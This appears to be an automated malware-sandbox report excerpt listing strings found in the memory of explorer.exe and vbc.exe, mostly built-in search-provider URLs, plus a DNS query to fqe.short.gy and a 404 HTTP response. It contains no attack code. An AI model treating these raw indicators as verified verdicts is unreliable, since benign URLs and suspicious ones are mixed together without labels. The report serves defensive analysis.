          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: fqe.short.gy
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Apr 2021 09:39:38 GMTContent-Type: text/htmlContent-Length: 808Connection: closeLast-Modified: Sat, 27 Jul 2019 17:29:53 GMTETag: "328-58ead01c2b1d3"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 69 73 20 70 61 67 65 20 65 69 74 68 65 72 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2c 20 6f 72 20 69 74 20 6d 6f 76 65 64 20 73 6f 6d 65 77 68 65 72 65 20 65 6c 73 65 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <link rel="stylesheet" href="/error_docs/styles.css"></head><body><div
          Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207576712.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: vbc.exe, 00000004.00000002.2186682993.0000000002740000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190357751.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2185288938.00000000020D0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2184022473.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: vbc.exe, 00000004.00000002.2187644735.0000000002B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2193363626.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: vbc.exe, 00000004.00000002.2187003140.0000000002927000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2190811877.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2207887750.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
